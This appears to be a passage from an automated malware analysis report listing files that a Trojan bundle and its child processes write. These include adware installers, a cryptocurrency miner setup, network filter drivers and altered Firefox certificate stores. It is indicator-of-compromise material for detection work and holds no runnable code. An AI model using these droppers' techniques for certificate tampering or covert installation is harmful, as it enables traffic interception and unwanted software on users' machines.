C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[2] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[2] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\verificar_ip[1].htm (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_gs[1] (61315 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe (2736 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe (18984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\310714_is.exe (45524 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe (64441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1] (61024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmD143.tmp (3145 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe (64732 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe (64846 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe (34340 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe (33323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_mb[1] (1928 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\240714_ps[1].exe (32080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe (127352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_is[1] (42448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe (20815 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe (7390 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\310714_br[1].exe (61429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_cp[1].exe (5984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_a9[1].exe (31080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\291014_nj[1].exe (119929 bytes)

The process powershell.exe:3772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2KY9FDOQT8H9H3WIW6VT.temp (196 bytes)

The process powershell.exe:3656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCWG3ST52CQ8BWKM1ZUM.temp (196 bytes)

The process powershell.exe:3376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\749D80PVBSBBMHTBLUY1.temp (196 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhED6B.tmp (112516 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhEA2F.tmp (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe (872 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\checks.txt (253 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\amisid.exe (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\cpuminer-x11opt-setup.exe (151433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\post_reply.htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B7.tmp (3040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\cpuminer-x11opt-setup[1].exe (142739 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\nsisos.dll (13 bytes)

The process XTab_Setup2253.exe:1748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
%Program Files% (x86)\XTab\skin\btn.png (2 bytes)
%Program Files% (x86)\XTab\install.data (68 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files% (x86)\XTab\HPNotify.exe (18514 bytes)
%Program Files% (x86)\XTab\conf (1626 bytes)
%Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1031.xpi (15 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\indexIE8.html (1794 bytes)
%Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
%Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\ver.txt (47 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
%Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
%Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
%Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
%Program Files% (x86)\XTab\CmdShell.exe (29 bytes)
%Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
%Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
%Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\main.xml (4 bytes)
%Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
%Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (21280 bytes)
%Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5469 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn5B4A.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (15928 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\msvcp110.dll (16990 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)

The process cmdshell.exe:3596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\HPNotify.exe (675 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tCE1709AA862C234DD936mp.tmp (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (304 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\conf (79 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\2[1].zip (213534 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\one.zip (29636 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (76078 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (10136 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\two.zip (74342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\1[1].zip (178958 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (12024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowser.exe (5199 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\GOSafer\gosafer.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\GOSafer\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\GOSafer\nfapi.dll (4992 bytes)
%Program Files% (x86)\GOSafer\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\GOSafer\gosaferdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\gosaferdrv.sys (51 bytes)
%Program Files% (x86)\GOSafer\uninst.exe (1793 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssF4BB.tmp (67374 bytes)
%Program Files% (x86)\GOSafer\ProtocolFilters.dll (9320 bytes)
%Program Files% (x86)\GOSafer\libeay32.dll (35507 bytes)

The process nfregdrv.exe:3588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\DesProtetor\nfapi.dll (118 bytes)

The process nfregdrv.exe:3076 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\ActSys\nfapi.dll (118 bytes)

The process nfregdrv.exe:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\CashReminder\nfapi.dll (118 bytes)

The process nfregdrv.exe:3924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\WNet\nfapi.dll (126 bytes)

The process nfregdrv.exe:3192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\GOSafer\nfapi.dll (118 bytes)

The process HPNotify.exe:3640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\conf (1480 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (24 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (24 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (24 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (49 bytes)

The process CashReminder.exe:3984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\CashReminder\ProtocolFilters.dll (249 bytes)

The process CashReminder.exe:1108 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\P_StoreList.txt (784 bytes)
C:\Windows\Temp\P_RuleList.txt (265 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[2].txt (265 bytes)
C:\Windows\Temp\CashReminder\mfs162E.tmp (3516 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\stores[1].htm (784 bytes)
C:\Windows\Temp\CashReminder\mfs310F.tmp (229227 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\CashReminder\libeay32.dll (35507 bytes)
%Program Files% (x86)\CashReminder\nfapi.dll (4992 bytes)
C:\Windows\System32\drivers\crfilterdrv.sys (51 bytes)
%Program Files% (x86)\CashReminder\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscDFF3.tmp (66830 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\CashReminder\CashReminder.exe (15982 bytes)
%Program Files% (x86)\CashReminder\uninstall.exe (1568 bytes)
%Program Files% (x86)\CashReminder\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\CashReminder\ProtocolFilters.dll (9320 bytes)
%Program Files% (x86)\CashReminder\crfilterdrv.sys (1856 bytes)

The process ActSys.exe:148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\ActSys\ProtocolFilters.dll (49 bytes)

The process ActSys.exe:3756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\ActSys\SSL\NJax Intermediate.cer (774 bytes)
C:\Windows\Temp\ActSys\SSL\cert.db (2 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[4].txt (197 bytes)
C:\Windows\Temp\P_RuleList.txt (197 bytes)

The process certutil.exe:3280 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (720 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\cert8.db (7444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\key3.db (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (364 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\NSISEncrypt.dll (3323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\IpConfig.dll (4254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsExec.dll (14 bytes)

The process amisetup2899__9664.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\index[1].htm (1199 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe:typelib (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amitest.txt (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\amipb[1].js (21314 bytes)

The process GOSafer.exe:3284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[3].txt (16 bytes)
C:\Windows\Temp\G_RuleList.txt (16 bytes)

The process GOSafer.exe:3264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\GOSafer\ProtocolFilters.dll (249 bytes)

The process WNet.exe:4016 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\WNet\ProtocolFilters.dll (249 bytes)

The process WNet.exe:3080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[1].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)

The process 310714_is.exe:948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\button-bg.png (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\ProgressBar.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo_new[1].png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\bootstrap_42881.html (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\button.css (417 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\declineBG[1].png (461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Yes_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ICReinstall_310714_is.exe (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg2.png (978 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\No_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\Rerarapepe_b[1].png (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg.png (1 bytes)
